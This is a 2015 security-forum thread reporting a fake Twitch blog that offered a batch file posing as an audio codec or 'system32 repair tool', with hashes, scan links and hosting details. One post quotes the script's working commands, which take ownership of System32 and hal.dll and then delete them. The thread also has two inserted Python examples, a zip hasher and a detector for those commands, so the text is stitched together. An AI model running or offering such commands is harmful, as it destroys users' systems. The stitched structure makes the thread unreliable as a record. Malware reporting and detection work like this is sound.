Author Topic: Fake Twitch Blog with System32 Malware. [Only 1 vendor currently blocks site]  (Read 22863 times)


REDACTED

  • Guest
Hi Avast Community,

I wanted to report in the open an active threat that's currently not being monitored by any internet security services.

Many Thanks to the reddit twitch community for pointing out this site.

Update: Note the site in question has a strikethrough to prevent people from visiting the sites in question. It's recommended that you do not visit any of the sites in question, as the virus/bat seems to be a really nasty piece of malware that is taking over system32 and removing/tampering with boot files. (Thanks again to the community for the analysis.)


Brief
The site in question is called '{domain}/blog' and '{domain}/audiofix/'; a hacker seems to have scraped the twitch.tv/blog site, which is hosted with WPEngine (a firm which uses Linode servers and not Amazon EC2 instances). The site's owner claims to provide a "brand new audio codec" by downloading a zip file containing a bat file. In addition the main stepte.ch site also includes a "system32 repairing tool", which is also a Windows bat file that deletes system32. In addition the person is claiming to be "Helper of Twitch. Lead Webmaster. Sound Engineer", which is completely incorrect.

In addition the root site '{domain}' also has a system32 virus remover. Here's a VirusTotal scan of that bat executable.
https://www.virustotal.com/en/file/fbf640ae0bd0da2c4101034df918910c31617a7b31d603b7900df13d67883937/analysis/1424955640/
and a Malwr scan: https://malwr.com/analysis/ZjkxMWVkMGVjOWY1NDkwMmExZjlmMzgxMDllOGVjNzM/
SHA256: fbf640ae0bd0da2c4101034df918910c31617a7b31d603b7900df13d67883937
MD5:  9cf75d716f6b698b5433db6bad4a2877


File Analysis
Here's a Malwr analysis of the .bat file. https://malwr.com/analysis/MWEyZTM2M2YzNTU1NGExMDkxNzkxOTgwYTk5MTU3NWY/
Here's the Virustotal analysis of the .bat file. https://www.virustotal.com/en/file/29c50017317cc6c79b1e6ab03e36f5b75780fdbf059615396d3a19625f35676e/analysis/1424954933/
MD5: 0535ba5eb8dbbd884a5429c5f87b810d
SHA 256: 29c50017317cc6c79b1e6ab03e36f5b75780fdbf059615396d3a19625f35676e
Only 1 anti-virus vendor has picked up that the file is harmful. Upon decompression the file loads as a bat file.

Here's a screenshot taken from the virtual machine at Malwr showing that the bat file is removing system32. http://i.imgur.com/cjWoaoD.jpg


Domain and Host Analysis
The domain in question is registered with GoDaddy using Domain Privacy Protection. The domain was registered on 2015-02-10. The site's active DNS servers are GoDaddy defaults ns41.domaincontrol.com and ns42.domaincontrol.com.

The site is being hosted at {IP} (Amazon Web Services) on an EC2 instance in US West. ASN Block: AS16509 if anyone is interested :-)


 

« Last Edit: March 02, 2015, 07:43:57 PM by [Oli] »

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37532
  • Not a avast user
Scanning the zip file doesn't give correct file info... MD5 and all other info will be for the zip and not the file inside,
so to get correct info, unzip and scan the file inside.
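Pondus' point above, as an added example that is not part of the thread: the hash of an archive identifies only the container, so a triage script should hash the archive and each member separately. The zip used here is constructed in memory from a harmless stand-in script, not the real download; the members are read into memory only, never extracted or executed.

```python
import hashlib
import io
import zipfile


def digests(data: bytes) -> dict:
    """MD5 and SHA-256 of a byte string as lowercase hex (the two hashes quoted in the thread)."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def hash_archive_and_members(zip_bytes: bytes) -> dict:
    """Hash the archive and, separately, every file stored inside it.

    The archive hash identifies only the container: re-zipping the same .bat
    with a different timestamp or compression level produces a new archive
    hash while the payload hash is unchanged. Submitting the inner file's
    hash is what lets a vendor match the script itself.
    """
    report = {"archive": digests(zip_bytes), "members": {}}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Read the member into memory only; nothing is extracted to disk or run.
            report["members"][info.filename] = digests(zf.read(info))
    return report


def build_sample_archive(payload: bytes, name: str = "sample.bat") -> bytes:
    """Constructed fixture: an in-memory zip holding one harmless file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


# Constructed, harmless stand-in for the downloaded script (not the real file).
SAMPLE_PAYLOAD = b"@echo off\r\necho constructed sample, not the real download\r\n"


if __name__ == "__main__":
    report = hash_archive_and_members(build_sample_archive(SAMPLE_PAYLOAD))
    print("archive    sha256:", report["archive"]["sha256"])
    for name, d in report["members"].items():
        print(f"{name:11}sha256:", d["sha256"])
```

Run it twice with a different compression level in `build_sample_archive` and the archive hash changes while the member hash stays put, which is exactly why the inner file's hash is the one worth submitting.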


REDACTED

  • Guest
Hi Pondus,

Sorry about that, Fixing this now! :-)

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Confirming this.
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33902
  • malware fighter
Hi !Donovan,

They, the guys from Qihoo-360, that detect the FP - virus.bat.danger.gen - even advise to scan in Safe Mode to kill the alleged malcode and then when to no avail eventually re-format the HD.  :o
是什么意思 = What does this mean? Shooting with elephant ammo unto a midget  :D
First we check whether there is a real threat.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

REDACTED

  • Guest
Quote from: polonus
Hi !Donovan,

They, the guys from Qihoo-360, that detect the FP - virus.bat.danger.gen - even advise to scan in Safe Mode to kill the alleged malcode and then when to no avail eventually re-format the HD.  :o
是什么意思 = What does this mean? Shooting with elephant ammo unto a midget  :D
First we check whether there is a real threat.

polonus

Hi Polonus,

I believe the scripts are being used by trolls on Twitch.tv on the unsuspecting public. There have been many recent organised "raids", that is twitch viewers telling broadcasters that their computer has a virus or is broken. They are sending people to this site to download the so-called "fix", only to find that the script deletes system32. It's an old troll trick, but the site in question looks legit. The fact that the malware publisher scraped the twitch.tv/blog site for their own fake blog is telling that they understand web technologies pretty well.

Proof of such claims: http://www.reddit.com/r/Twitch/comments/2x4wzj/dangerous_page_faking_twitch_blog_page_please_read/
and Videos: https://www.youtube.com/watch?v=WnfrSIPxb_4 (this is a manual social engineering style of attack. Nothing script side though; this is the first time I've seen malware being created just for deleting system32 aimed at twitch users.)

Thanks
Oliver
« Last Edit: February 26, 2015, 02:12:56 PM by OliPicard »

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33902
  • malware fighter
Hi Oliver,

Best reaction to such trolls is never to react and make the troll feel bored.
Banning them without further ado and comment is very effective.

Damian

REDACTED

  • Guest
Quote from: polonus
Hi Oliver,

Best reaction to such trolls is never to react and make the troll feel bored.
Banning them without further ado and comment is very effective.

Damian

I agree! In fact there are many awesome IRC bots that filter out bad traffic. MooBot and Nightbot are great tools for getting rid of URLs from the livestream; however, some are very new to livestreaming and are pretty vulnerable. More education is needed to educate people about the risks of livestreaming.


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33902
  • malware fighter
Hi Oliver,

And those into it should be aware that it is being frowned upon especially by old content media:
news/is-live-streaming-your-premiere-680201

Damian

REDACTED

  • Guest
Quick update.

An enterprise security vendor has now listed the site as containing malware. I have supplied them with samples of the files too. I've also sent reports to a larger OEM enterprise vendor to get the site added to their blacklists as well.


Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Thanks for the update; glad to see detections are being added.

~!Donovan

Offline Michael (alan1998)

  • Massive Poster
  • ****
  • Posts: 2768
  • Volunteer
Nasty thing, taking ownership of System32. Ouch

Code:
takeown /f "%systemdrive%\Windows\System32\hal.dll" >nul 2>&1 && icacls "%systemdrive%\Windows\System32\hal.dll" /grant administrators:F /t >nul 2>&1
del /f/s/q "%systemdrive%\Windows\System32\hal.dll" >nul 2>&1
takeown /f "%systemdrive%\Windows\System32" /r /d y >nul 2>&1
icacls "%systemdrive%\Windows\System32" /grant administrators:F /t >nul 2>&1
del /f/s/q "%systemdrive%\Windows\System32" >nul 2>&1
rmdir /s/q "%systemdrive%\Windows\System32" >nul 2>&1


Not only System32, but Hal.dll! WHAT!? Seriously? That's freaking dangerous!

Edit: Take a look at this!

Code:
takeown /f "%systemdrive%\Windows\System32\hal.dll" >nul 2>&1 && icacls "%systemdrive%\Windows\System32\hal.dll" /grant administrators:F /t >nul 2>&1
del /f/s/q "%systemdrive%\Windows\System32\hal.dll" >nul 2>&1

Hal.dll is MANDATORY for reboot. This would completely destroy your system using just that line of code, with Admin Permissions! Deadly little file!
« Last Edit: February 26, 2015, 04:14:59 PM by Michael (alan1998) »
VOLUNTEER

Senior Security Analyst; Sys Admin (Linux); Forensics/Incident Response.

Security is a mindset, not an application. Think BEFORE you click.

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Thanks for the analysis Michael. I didn't know about hal.dll.


This is a good example of a program that does completely the opposite of what it's expected to do.

Offline Michael (alan1998)

  • Massive Poster
  • ****
  • Posts: 2768
  • Volunteer
If you ever boot into Safe Mode using Windows. Hal.dll is always listed.

The Takeown and Del are self explanatory. Essentially, what it is doing is using something very close to TakeOwnership.reg. It takes the file over for that user, and then that user can do whatever they want to.

Del is to Delete the file.

This is certainly a very, very nasty file. And it's extremely small, making it suitable for those even on Dial Up (whoever still is).
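Michael's two posts above describe the pattern that makes this script dangerous: an ownership grab (takeown), an ACL change (icacls), then a delete, each with its output silenced. As an added example that is not code from the thread or from any vendor, here is a Python triage script that statically flags such lines in a batch file so an analyst or a quarantine rule can label it before anyone runs it. The two sample scripts inside it are constructed for the demonstration (the first abbreviates the posted pattern, the second is a harmless installer), not the real download, and the `scan_batch`/`verdict` names are this example's own.

```python
import re

# Paths under the Windows system directory, written with any of the usual
# environment variables or an absolute drive letter.
SYSTEM32 = re.compile(
    r'(?:%systemdrive%\\windows|%systemroot%|%windir%|[a-z]:\\windows)\\system32(?=[\\"\s]|$)',
    re.IGNORECASE,
)
# First token of a command segment: ownership / ACL verbs and removal verbs.
COMMAND = re.compile(r'^\s*(takeown|icacls|cacls|del|erase|rmdir|rd)\b', re.IGNORECASE)
# Standard output and error output both discarded, as in the posted script.
SILENCED = re.compile(r'>\s*nul\b.*2>&1', re.IGNORECASE)

DESTRUCTIVE_CMDS = {"del", "erase", "rmdir", "rd"}  # the rest of COMMAND is permission tampering


def scan_batch(text: str) -> list:
    """Flag every command that touches System32 with an ownership, ACL or delete verb."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.lower().startswith(("rem ", "::")):
            continue
        # Split chained commands so "takeown ... && icacls ..." yields two hits.
        for segment in re.split(r"\s*&&\s*", line):
            m = COMMAND.match(segment)
            if not m or not SYSTEM32.search(segment):
                continue
            cmd = m.group(1).lower()
            findings.append({
                "line": line_no,
                "command": cmd,
                "severity": "critical" if cmd in DESTRUCTIVE_CMDS else "high",
                "silenced": bool(SILENCED.search(segment)),
                "text": segment,
            })
    return findings


def verdict(findings: list) -> str:
    """Collapse findings into one label for the analyst or a quarantine rule."""
    if any(f["severity"] == "critical" for f in findings):
        return "destructive"
    return "suspicious" if findings else "clean"


# Constructed sample mirroring the two lines quoted in the thread (not the real download).
SUSPECT_BAT = (
    '@echo off\r\n'
    'takeown /f "%systemdrive%\\Windows\\System32\\hal.dll" >nul 2>&1 '
    '&& icacls "%systemdrive%\\Windows\\System32\\hal.dll" /grant administrators:F /t >nul 2>&1\r\n'
    'del /f/s/q "%systemdrive%\\Windows\\System32\\hal.dll" >nul 2>&1\r\n'
)
# Constructed harmless installer: uses del, but never near the system directory.
BENIGN_BAT = (
    '@echo off\r\n'
    'rem installs the codec into its own folder\r\n'
    'mkdir "%ProgramFiles%\\AudioFix"\r\n'
    'copy codec.dll "%ProgramFiles%\\AudioFix\\" >nul\r\n'
    'del /q "%TEMP%\\audiofix_setup.log"\r\n'
)


if __name__ == "__main__":
    for label, script in (("suspect", SUSPECT_BAT), ("benign", BENIGN_BAT)):
        found = scan_batch(script)
        print(f"{label}: {verdict(found)}")
        for f in found:
            flag = " (output silenced)" if f["silenced"] else ""
            print(f"  line {f['line']}: {f['command']} [{f['severity']}]{flag}")
```

The benign script is the reason the path check exists: `del` on its own is everyday batch usage, and a rule that fires on the verb alone would drown the real finding in noise. The "output silenced" flag is a secondary signal; a legitimate repair tool has no reason to hide the errors it hits while deleting hal.dll.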

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33902
  • malware fighter
Hi !Donovan,

The hal.dll file is a hidden file that is used by Windows 7 to communicate with your computer's hardware.

hal.dll is a legit file and can create BSODs on errors, and when it is missing, your machine may fail to start at all. Virus interaction is also known: http://repairshala.weebly.com/c-virus-program-to-delete-haldll-file-and-shutdown-the-system.html
(two virus proggies in C++ in this link).
See: https://neosmart.net/wiki/hal-dll-missing-corrupt/

polonus